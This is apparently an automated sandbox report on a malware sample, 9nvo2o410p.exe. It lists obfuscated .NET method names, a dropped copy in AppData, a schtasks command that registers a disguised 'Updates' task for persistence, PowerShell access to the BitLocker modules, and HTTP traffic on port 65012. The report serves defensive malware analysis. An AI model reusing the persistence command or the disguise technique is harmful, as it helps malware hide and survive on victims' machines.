Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, wcrveNuYWcRZm90toR.cs High entropy of concatenated method names: 'nyjnI8wUgG', 'eJAnoYhVZM', 'zMRGwEm0yH', 'a6fGs5qq2j', 'CQGn4O5512', 'cPsn6A2bon', 'bbwnPswL3w', 'a1enfO82LP', 'TN3nq6oHME', 'w5MnT5XnP5'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, u01jw6rOHDCPRVpBsM.cs High entropy of concatenated method names: 'kAFsCEHdFb', 'tOZsjtZXLt', 'atZsNF0nUa', 'FnPsHYKP8q', 'u4tstdr8YA', 'shssa4lNPy', 'g0Zjli1uQPjlmB1dTP', 'GppNT8qR4P4O0ff24N', 'kI8ssXwMTF', 'UivsLjuUiC'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, ncLarAowcsDjmNPHYT.cs High entropy of concatenated method names: 'rovxs5MUR9', 'faDxL4ih6F', 'aJuxruMBBX', 'kwnxYLs8gj', 'fKyxvgScvh', 'mqNxgGDKIc', 'eN2x0fTdaK', 'i4sGyqTXdS', 'ifvGI2s445', 'Dn8Gduqcsw'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, c4pXcmeD0If7xYZtkt.cs High entropy of concatenated method names: 'jm9nNnuUSH', 'NgknHqVTX0', 'ToString', 'jXLnYh3RCv', 'JySnvH86X4', 'f1nniC2hbU', 'o8Ing34bJt', 'jdUn0HDBCT', 'OuOnCgqYUf', 'e22njHPMHH'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, B3A4aMhYAlhcBrwEOH.cs High entropy of concatenated method names: 'qHgXnfOHe', 'PSukTuUyP', 'RWNFWNrvi', 'xG1BcvOKN', 'wfUl897gm', 'e3iKHq3Dl', 'fcgdHAMofZghYy16ui', 'QUK29FkJNSjcXISube', 'AUsGy0PAT', 'ScD7jpxUx'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, npJuWfI0dKNVPP9Xtc.cs High entropy of concatenated method names: 'oM9GYeufJn', 'pfYGvxWtDx', 'Q4xGiBF63B', 'd7YGgl7Ikp', 'DmaG0l15QW', 'yaFGCgnLi6', 'RqnGjHLmdt', 'Nu5GQuFi44', 'aWOGNVIh1Z', 'MLKGHdS4qt'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, Llq0t439bA6rndh5A3.cs High entropy of concatenated method names: 'WnHCRqfajD', 'pc0CJ6AeIE', 'v17CX2DOb7', 'zADCkSak5v', 'mvuC9MXLqv', 'UTuCFLEj2i', 'PuWCBZEJLM', 'oL8CmiwGDv', 'CmbCl0DorI', 'p2GCKN9aPw'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, LT6skEfDwSmjl1ilja.cs High entropy of concatenated method names: 'IXEt1rPFy6', 'I1Xt6EwxLd', 'Ir7tfKZI1J', 's7dtq9H03U', 'p5atO7jXhT', 'vi4tUYbD5Y', 'cDht2Mafgw', 'Q5ltWYMdCc', 'V6wtABiFNv', 'axet5LDG4X'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, vulyWwltZF0nUaKnPY.cs High entropy of concatenated method names: 'WtHikO2q1y', 'H2liF3gNXp', 'h8rim9hLLb', 'TsbilhNfJZ', 'Mx5itirJMM', 'nb8iaSr8nc', 'OS1inRCQ99', 'wl6iGbidR4', 'RUpixPLQMR', 'LAti7gdJDv'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, MuaSWAzJ8LXxXnZiXB.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jPgx8bpT2U', 'IjsxtOGRkL', 'lf4xak6rFF', 'LnQxnNWiDK', 'fKDxGtCg9V', 'H1hxxHeTXk', 'AVDx7dhTHv'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, nYAxhsD4lNPyCBItLQ.cs High entropy of concatenated method names: 'xHN0S94ZI1', 'iKV0vltaJp', 'Eb80glmwG6', 'gqe0CKog0e', 'OYR0j53oaQ', 'KiRgbtwyFM', 'EafgutyOVH', 'Gjjgy9y471', 'RrOgIvmtsm', 'kg5gddVt1Q'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, oTpuYTOX9wgZYgi0Ee.cs High entropy of concatenated method names: 'XIjPNISO8Nhd6elgIOQ', 'SlDofXSmJ2D1EURpIxF', 'QBC0GKN3vL', 'WkZ0xATUrq', 'hXe07LaOE4', 'xRwpV8S6byC2xDvPRg1', 'xUAQTIS49TJGpBfAd99'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, FP8qOBK6srpkNV4tdr.cs High entropy of concatenated method names: 'zPtg9YMCam', 'mbQgBnx5yV', 'm34iUveN3n', 'RZXi2xah7r', 'qRZiWooN4X', 'ze8iAVhUmq', 'h81i5YbA8W', 'zTViE3WoUE', 'cBei3Fli7D', 'pqpi1AK2yd'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, FBUVv8swp5VrtpVXRGd.cs High entropy of concatenated method names: 'IvbxRBZhw2', 'NxTxJZPnyl', 'yB8xXZINP9', 'QrBxkv4w55', 'fljx9hIo0e', 'yafxFcxeUD', 'cbDxBtrdtv', 'SwMxmt77In', 'WwRxl4l4MC', 'RKPxKVumi9'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, ErG78BdSL9gwKtEDNY.cs High entropy of concatenated method names: 'KeKGDmVxNI', 'OGAGO3vOG7', 'PURGUbxXBc', 'DyCG2gwIoK', 'V0LGfGh24Z', 'gVgGWaE2Ju', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, nmZqj3PPRpAVByFV9P.cs High entropy of concatenated method names: 'kL88m2ghkx', 'aXU8l32E4s', 'Oka8DCPPA0', 'rPv8OuPK9j', 'd5G82GMFiZ', 'a3L8WtkyMm', 'DIV85II7ER', 'r548EsQ9c2', 'm2s81LQFPY', 'OEk843xT72'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, BEHdFbmZOZtZXLturr.cs High entropy of concatenated method names: 'a5bvfGLVYy', 'MmqvqO2f5u', 'yeVvTXeM4o', 'gHMvef6UdC', 'lATvbHwr1G', 'Kh1vu2Ye5C', 'TC1vykmYvL', 'CoYvIfiS4G', 'Iq6vdcoWhF', 'pGavopdY2o'
Source: 0.2.9nvo2o410p.exe.417ae00.5.raw.unpack, QKF7tG5a13tEMOiUiU.cs High entropy of concatenated method names: 'covCY7Y6c1', 'NuyCi8j03u', 'IRcC0cgqAo', 'e4n0o4klrJ', 'CDv0zn8fZW', 'pyRCw2FefC', 'akqCs4WGDP', 'uHAChKpWTa', 'LlNCLoKdel', 'YytCryTMUn'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, dJg5V9sLrkK3OMV4dNX.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'iSJ7fuFPYa', 'Tnr7qDOhdx', 'zEn7TKF4Av', 'eas7eqmOp7', 'Rso7bd3FFx', 'tGg7ukd6GQ', 'oun7yCdYPw'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, jnhjP9jaQCZeMdkJyZ.cs High entropy of concatenated method names: 'WZLLSZw9u9', 'lTxLYsRQZR', 'woxLvFZ9Wh', 'JjKLi0xQTX', 'i1ILgV4L3M', 'eSHL0KIHDe', 'h3lLCRPCnt', 'qR9LjNBZEy', 'WEmLQoAEn3', 'tdLLNN3DoX'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, dSiIGkvGHM85O3iYLL.cs High entropy of concatenated method names: 'Dispose', 'bPysd00Zks', 'JEihOV41vq', 'yhOMMVouQf', 'q8psoJuWf0', 'YKNszVPP9X', 'ProcessDialogKey', 'ocmhwrG78B', 'eL9hsgwKtE', 'GNYhhHcLar'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, wcrveNuYWcRZm90toR.cs High entropy of concatenated method names: 'nyjnI8wUgG', 'eJAnoYhVZM', 'zMRGwEm0yH', 'a6fGs5qq2j', 'CQGn4O5512', 'cPsn6A2bon', 'bbwnPswL3w', 'a1enfO82LP', 'TN3nq6oHME', 'w5MnT5XnP5'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, u01jw6rOHDCPRVpBsM.cs High entropy of concatenated method names: 'kAFsCEHdFb', 'tOZsjtZXLt', 'atZsNF0nUa', 'FnPsHYKP8q', 'u4tstdr8YA', 'shssa4lNPy', 'g0Zjli1uQPjlmB1dTP', 'GppNT8qR4P4O0ff24N', 'kI8ssXwMTF', 'UivsLjuUiC'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, ncLarAowcsDjmNPHYT.cs High entropy of concatenated method names: 'rovxs5MUR9', 'faDxL4ih6F', 'aJuxruMBBX', 'kwnxYLs8gj', 'fKyxvgScvh', 'mqNxgGDKIc', 'eN2x0fTdaK', 'i4sGyqTXdS', 'ifvGI2s445', 'Dn8Gduqcsw'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, c4pXcmeD0If7xYZtkt.cs High entropy of concatenated method names: 'jm9nNnuUSH', 'NgknHqVTX0', 'ToString', 'jXLnYh3RCv', 'JySnvH86X4', 'f1nniC2hbU', 'o8Ing34bJt', 'jdUn0HDBCT', 'OuOnCgqYUf', 'e22njHPMHH'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, B3A4aMhYAlhcBrwEOH.cs High entropy of concatenated method names: 'qHgXnfOHe', 'PSukTuUyP', 'RWNFWNrvi', 'xG1BcvOKN', 'wfUl897gm', 'e3iKHq3Dl', 'fcgdHAMofZghYy16ui', 'QUK29FkJNSjcXISube', 'AUsGy0PAT', 'ScD7jpxUx'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, npJuWfI0dKNVPP9Xtc.cs High entropy of concatenated method names: 'oM9GYeufJn', 'pfYGvxWtDx', 'Q4xGiBF63B', 'd7YGgl7Ikp', 'DmaG0l15QW', 'yaFGCgnLi6', 'RqnGjHLmdt', 'Nu5GQuFi44', 'aWOGNVIh1Z', 'MLKGHdS4qt'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, Llq0t439bA6rndh5A3.cs High entropy of concatenated method names: 'WnHCRqfajD', 'pc0CJ6AeIE', 'v17CX2DOb7', 'zADCkSak5v', 'mvuC9MXLqv', 'UTuCFLEj2i', 'PuWCBZEJLM', 'oL8CmiwGDv', 'CmbCl0DorI', 'p2GCKN9aPw'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, LT6skEfDwSmjl1ilja.cs High entropy of concatenated method names: 'IXEt1rPFy6', 'I1Xt6EwxLd', 'Ir7tfKZI1J', 's7dtq9H03U', 'p5atO7jXhT', 'vi4tUYbD5Y', 'cDht2Mafgw', 'Q5ltWYMdCc', 'V6wtABiFNv', 'axet5LDG4X'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, vulyWwltZF0nUaKnPY.cs High entropy of concatenated method names: 'WtHikO2q1y', 'H2liF3gNXp', 'h8rim9hLLb', 'TsbilhNfJZ', 'Mx5itirJMM', 'nb8iaSr8nc', 'OS1inRCQ99', 'wl6iGbidR4', 'RUpixPLQMR', 'LAti7gdJDv'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, MuaSWAzJ8LXxXnZiXB.cs High entropy of concatenated method names: 'CanConvertFrom', 'ConvertFrom', 'ConvertTo', 'jPgx8bpT2U', 'IjsxtOGRkL', 'lf4xak6rFF', 'LnQxnNWiDK', 'fKDxGtCg9V', 'H1hxxHeTXk', 'AVDx7dhTHv'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, nYAxhsD4lNPyCBItLQ.cs High entropy of concatenated method names: 'xHN0S94ZI1', 'iKV0vltaJp', 'Eb80glmwG6', 'gqe0CKog0e', 'OYR0j53oaQ', 'KiRgbtwyFM', 'EafgutyOVH', 'Gjjgy9y471', 'RrOgIvmtsm', 'kg5gddVt1Q'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, oTpuYTOX9wgZYgi0Ee.cs High entropy of concatenated method names: 'XIjPNISO8Nhd6elgIOQ', 'SlDofXSmJ2D1EURpIxF', 'QBC0GKN3vL', 'WkZ0xATUrq', 'hXe07LaOE4', 'xRwpV8S6byC2xDvPRg1', 'xUAQTIS49TJGpBfAd99'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, FP8qOBK6srpkNV4tdr.cs High entropy of concatenated method names: 'zPtg9YMCam', 'mbQgBnx5yV', 'm34iUveN3n', 'RZXi2xah7r', 'qRZiWooN4X', 'ze8iAVhUmq', 'h81i5YbA8W', 'zTViE3WoUE', 'cBei3Fli7D', 'pqpi1AK2yd'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, FBUVv8swp5VrtpVXRGd.cs High entropy of concatenated method names: 'IvbxRBZhw2', 'NxTxJZPnyl', 'yB8xXZINP9', 'QrBxkv4w55', 'fljx9hIo0e', 'yafxFcxeUD', 'cbDxBtrdtv', 'SwMxmt77In', 'WwRxl4l4MC', 'RKPxKVumi9'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, ErG78BdSL9gwKtEDNY.cs High entropy of concatenated method names: 'KeKGDmVxNI', 'OGAGO3vOG7', 'PURGUbxXBc', 'DyCG2gwIoK', 'V0LGfGh24Z', 'gVgGWaE2Ju', 'Next', 'Next', 'Next', 'NextBytes'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, nmZqj3PPRpAVByFV9P.cs High entropy of concatenated method names: 'kL88m2ghkx', 'aXU8l32E4s', 'Oka8DCPPA0', 'rPv8OuPK9j', 'd5G82GMFiZ', 'a3L8WtkyMm', 'DIV85II7ER', 'r548EsQ9c2', 'm2s81LQFPY', 'OEk843xT72'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, BEHdFbmZOZtZXLturr.cs High entropy of concatenated method names: 'a5bvfGLVYy', 'MmqvqO2f5u', 'yeVvTXeM4o', 'gHMvef6UdC', 'lATvbHwr1G', 'Kh1vu2Ye5C', 'TC1vykmYvL', 'CoYvIfiS4G', 'Iq6vdcoWhF', 'pGavopdY2o'
Source: 0.2.9nvo2o410p.exe.77c0000.10.raw.unpack, QKF7tG5a13tEMOiUiU.cs High entropy of concatenated method names: 'covCY7Y6c1', 'NuyCi8j03u', 'IRcC0cgqAo', 'e4n0o4klrJ', 'CDv0zn8fZW', 'pyRCw2FefC', 'akqCs4WGDP', 'uHAChKpWTa', 'LlNCLoKdel', 'YytCryTMUn'
Source: C:\Users\user\Desktop\9nvo2o410p.exe File created: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Jump to dropped file

Boot Survival

barindex
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process created: C:\Windows\SysWOW64\schtasks.exe "C:\Windows\System32\schtasks.exe" /Create /TN "Updates\FAwLPzxPWWF" /XML "C:\Users\user\AppData\Local\Temp\tmp4717.tmp"

Hooking and other Techniques for Hiding and Protection

barindex
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\BitLocker.psd1 Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\en-US\BitLocker.psd1 Jump to behavior
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 49733 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49733
Source: unknown Network traffic detected: HTTP traffic on port 49738 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 49736 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49736
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49738
Source: unknown Network traffic detected: HTTP traffic on port 49740 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49740
Source: unknown Network traffic detected: HTTP traffic on port 49743 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49743
Source: unknown Network traffic detected: HTTP traffic on port 49746 -> 65012
Source: unknown Network traffic detected: HTTP traffic on port 65012 -> 49746
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\AutoUpdate
Source: C:\Users\user\AppData\Roaming\FAwLPzxPWWF.exe Registry key monitored for changes: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\Desktop\9nvo2o410p.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
